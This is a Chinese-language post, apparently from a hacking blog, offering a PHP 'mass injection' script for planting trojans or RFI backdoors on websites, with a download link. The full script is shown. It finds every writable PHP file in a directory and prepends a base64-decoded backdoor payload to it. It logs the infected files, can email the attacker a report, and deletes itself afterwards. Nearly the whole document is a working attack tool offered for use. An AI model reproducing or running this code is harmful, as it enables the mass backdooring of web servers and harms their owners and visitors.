PHP批量挂马脚本

来源：红狼作者：f3v3r

批量写入档案脚本… 可以拿来挂马也能拿来当RFI的后门注入 code都写明的，有需要的请自己看后门写在$inj里面，要做base64 encode的Polymorphic 不希望这个东西被搞破坏的人拿去玩懂原理的就自个儿收下吧

1
<?php
2
set_time_limit(0);
3
ignore_user_abort(1);
4
# PHP Mass Injection Script by f3v3r ver.228
5
# |1| Look for PHP in directory.|2| Check injected.
6
# |3| Inject script. |4|Can email report to you.
7
$inj ='';
8
$log_email = 0;//change 1 enable, somehow they can trace you by this way.
9
$email = 'f3v3r@cc.cc';
10
$log_report = 1;
11
$filename = '__log.html';
12
$delete_me = 1;
13

14
echo '<title>f3v3r injection toolz</title><center><strong>Defacez aint hack, r00tz r.</strong></center><br>';
15
$dir = opendir('.');
27 collapsed lines
16
$site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
17
while ($file = readdir($dir))
18
{
19
if (strstr($file, '.php') && is_writeable($file))
20
{
21
$victim = fopen($file, 'r+');
22
$victim_read = fread($victim, filesize($file));
23
if (!strstr($victim_read, 'f3v3r'))
24
{
25
fclose($victim);
26
unlink($file);
27
$new = fopen($file, 'a+');
28
$new_write = fwrite($new, base64_decode($inj) . $victim_read);
29
fclose($new);
30
echo '<strong>[-] injecting : ' . $site . '</strong><br>';
31
echo '[x] injected: ' . $file . '<br>';
32
if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() . $file . '<br>'); fclose($log); }
33
if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() . $file . '
34
'); fclose($x); }
35
}
36
}
37
}
38
closedir($dir);
39
if($log_email) { $report = file_get_contents('__tmp'); mail($email, "injection report", '<br>f3v3r<br> ' .$report, 'From: f3v3r <f3v3r@cc.cc>'); unlink('__tmp'); echo '[x] Email Report Sent!';}
40
if($delete_me) { unlink(__file__); }
41
exit;
42
?>

MD5 checksum

#f3v3r

下载：[injection.rar](/blog/download.asp?id=55 (1.52 KB)